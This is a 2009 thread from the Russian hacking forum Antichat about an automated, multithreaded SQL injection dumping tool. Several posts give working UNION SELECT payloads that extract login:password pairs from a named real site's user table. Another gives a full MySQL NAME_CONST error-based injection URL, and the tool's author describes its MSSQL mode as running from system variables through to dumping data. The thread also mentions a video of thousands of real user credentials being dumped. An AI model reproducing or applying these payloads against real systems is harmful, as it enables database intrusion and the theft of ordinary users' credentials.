ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Программирование > PHP, PERL, MySQL, JavaScript
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 13.11.2009, 00:58
Аватар для Pashkela
Pashkela
Динозавр
Регистрация: 10.01.2008
Сообщений: 2,841
Провел на форуме:
9220514

Репутация: 3338


Отправить сообщение для Pashkela с помощью ICQ
По умолчанию

Ну, проверил, пишет 12 с чем то тысяч юзеров, выводит около 170 - значит реально 170 и есть. Можешь проверить запросом:

+union+select+1,2,3,4,5,count(*),7,8,9,10,11+from+ mobile_funsat1.polyfun_users

покажет 12651

но это не значит, что это так и есть. База может быть порушена, юзеры могут быть некорректно удалены и т.д.

Реально дампит то, что дампится. То, что считается, далеко не всегда соотвествует действительности

PS: 10 потоков

Прежде, чем кидать предъявы, проверь:

+union+select+1,2,3,4,5,concat_ws(0x3a,login,pass) ,7,8,9,10,11+from+mobile_funsat1.polyfun_users+lim it+200,1

если выведет логин и пароль - то я съем свою мышку

Последний раз редактировалось Pashkela; 13.11.2009 в 01:02..
 
Ответить с цитированием

  #2  
Старый 13.11.2009, 01:06
Аватар для axe89
axe89
Участник форума
Регистрация: 18.08.2008
Сообщений: 138
Провел на форуме:
1835548

Репутация: 92
Отправить сообщение для axe89 с помощью ICQ
По умолчанию

я если чесно когда про тулзу незнал я в ручную переберал дошол до 2к
 
Ответить с цитированием

  #3  
Старый 13.11.2009, 01:12
Аватар для Pashkela
Pashkela
Динозавр
Регистрация: 10.01.2008
Сообщений: 2,841
Провел на форуме:
9220514

Репутация: 3338


Отправить сообщение для Pashkela с помощью ICQ
По умолчанию

ок, еще раз:

+union+select+1,2,3,4,5,concat_ws(0x3a,login,pass) ,7,8,9,10,11+from+mobile_funsat1.polyfun_users+lim it+200,1

ты хочешь сказать, что при данном запросе что-то выводит?

PS: Нестандартные запросы, типо

limit 20,20 - не поддерживаются

Последний раз редактировалось Pashkela; 13.11.2009 в 01:15..
 
Ответить с цитированием

  #4  
Старый 13.11.2009, 01:17
Аватар для axe89
axe89
Участник форума
Регистрация: 18.08.2008
Сообщений: 138
Провел на форуме:
1835548

Репутация: 92
Отправить сообщение для axe89 с помощью ICQ
По умолчанию

+union+select+1,2,3,4,5,concat_ws(0x3a,login,pass) ,7,8,9,10,11+ from+polyfun_users+limit+2000,15
 
Ответить с цитированием

  #5  
Старый 13.11.2009, 16:51
Аватар для Pashkela
Pashkela
Динозавр
Регистрация: 10.01.2008
Сообщений: 2,841
Провел на форуме:
9220514

Репутация: 3338


Отправить сообщение для Pashkela с помощью ICQ
По умолчанию

udate:

MySql inj NAME_CONST:

- Многопоточный
- POST/GET/Coockies & etc.
- Все те же возможности, что и при обычной скуле + та же скорость
- просто заменить два раза "version()" на "^" (shift+6), т.е. было:

Код:
http://site.com/index.php?site=profile&id=1'/**/and/**/1=(SELECT/**/*/**/FROM(SELECT/**/*/**/FROM(SELECT/**/NAME_CONST((version()),14)d)/*/as/**/t/**/JOIN/**/(SELECT/**/NAME_CONST((version()),14)e)b)a)/**/and/**/'1'='1/*
стало:

Код:
http://site.com/index.php?site=profile&id=1'/**/and/**/1=(SELECT/**/*/**/FROM(SELECT/**/*/**/FROM(SELECT/**/NAME_CONST((^),14)d)/*/as/**/t/**/JOIN/**/(SELECT/**/NAME_CONST((^),14)e)b)a)/**/and/**/'1'='1/*
Отдельный риспект хотелось бы выразить Qwazar и jokester за эту тему.

В видео рассмотрен полный процесс от получения версия до дампа 3 373 юзеров (логины/пароли) с риал сайта.

Видео: - режим MySql inj NAME_CONST

Обновления как всегда в первом посте темы, скрипт в UTF-8

Последний раз редактировалось Pashkela; 13.11.2009 в 19:02..
 
Ответить с цитированием

  #6  
Старый 13.11.2009, 22:50
Аватар для Pashkela
Pashkela
Динозавр
Регистрация: 10.01.2008
Сообщений: 2,841
Провел на форуме:
9220514

Репутация: 3338


Отправить сообщение для Pashkela с помощью ICQ
По умолчанию

В режиме MySQL injection column number bruter решающее значение имеет уникальная мессага при правильном/неправильном запросе именно кол-ва столбцов. Проверял на 105 колонках - все работает.

PS: Нет никогда абсолютной гарантии, что тулза сработает на любой инъекции, это тоже учитывайте. На большинстве, но не на абсолютно всех, как и любая другая прога такого типа. Всегда есть какие-то особенности, всё не предусмотришь

Играйте с потоками - уменьшайте вплоть до одного при некорректных ответах. Большое значение имеет качество коннекта с сайтом и ширина вашего интернет канала в том числе.

Последний раз редактировалось Pashkela; 13.11.2009 в 22:52..
 
Ответить с цитированием

  #7  
Старый 15.11.2009, 07:28
Аватар для YuNi|[c
YuNi|[c
Участник форума
Регистрация: 17.09.2006
Сообщений: 248
Провел на форуме:
556476

Репутация: 66
По умолчанию

прога класс, но кто нит знает многопоточную дампер на MSSQL(silviasql и DarkMSSQL не в счет, они на больших базах тормозит)? Toolza прекрасно работает с большыми базами, но жал только на MySQL ((

очень надо если кто знает на MSSQL
 
Ответить с цитированием

  #8  
Старый 15.11.2009, 14:46
Аватар для Pashkela
Pashkela
Динозавр
Регистрация: 10.01.2008
Сообщений: 2,841
Провел на форуме:
9220514

Репутация: 3338


Отправить сообщение для Pashkela с помощью ICQ
По умолчанию

2-ой пост темы:

https://forum.antichat.ru/showpost.php?p=236188&postcount=3

А вообще сейчас пишу

Последний раз редактировалось Pashkela; 15.11.2009 в 16:16..
 
Ответить с цитированием

  #9  
Старый 16.11.2009, 03:02
Аватар для Pashkela
Pashkela
Динозавр
Регистрация: 10.01.2008
Сообщений: 2,841
Провел на форуме:
9220514

Репутация: 3338


Отправить сообщение для Pashkela с помощью ICQ
По умолчанию

udate:

MSSQL injection:

- POST/GET/Cookie & etc.
- Определение кол-ва колонок и принтабельной колонки не требуется
- авто-CHAR всех данных
- Полный цикл - от системных переменных до данных из колонок:
1) Получаем системные переменные (@@version,system_user,db_name())
2) Таблицы из information_schema.tables (1 thread, специфика MSSQL inj)
3) Колонки из таблицы (1 thread, специфика MSSQL inj)
4) Данные из таблицы на основе выбранных колонок (Multithread, max 10) - обязательно наличие autoincriment поля (id & etc).

Видео: режим MSSQL injection

PS: Пока сыровато конечно, но из 10 скулей 8 обработало. Пока только исключительно для классических случаев. Need more tests

Последний раз редактировалось Pashkela; 16.11.2009 в 03:56..
 
Ответить с цитированием

  #10  
Старый 16.11.2009, 05:34
Аватар для YuNi|[c
YuNi|[c
Участник форума
Регистрация: 17.09.2006
Сообщений: 248
Провел на форуме:
556476

Репутация: 66
По умолчанию

главное 10потоков на Dump вставил, молодец будем тестит.
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Групарик 1.0 - скрипт для массовой рассылки приглашений на группы [В]Контакте HERO Покупка, продажа, услуги в Соц. Сетях 19 31.10.2009 10:26
Продажа от Goldriver'a Goldriver ICQ - Покупка, продажа 3 06.07.2009 20:15
Мобильные браузеры Skyfire 1.0 и Opera Mobile 9.7 jerrri Мировые новости 0 10.06.2009 18:29
Самая главная программа для Интернета: некоторые факты о веб-браузерах. FordMX Soft - Windows 4 17.04.2009 22:33
FreeDOS v 1.0 released spencer Мировые новости 12 11.09.2006 20:43



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ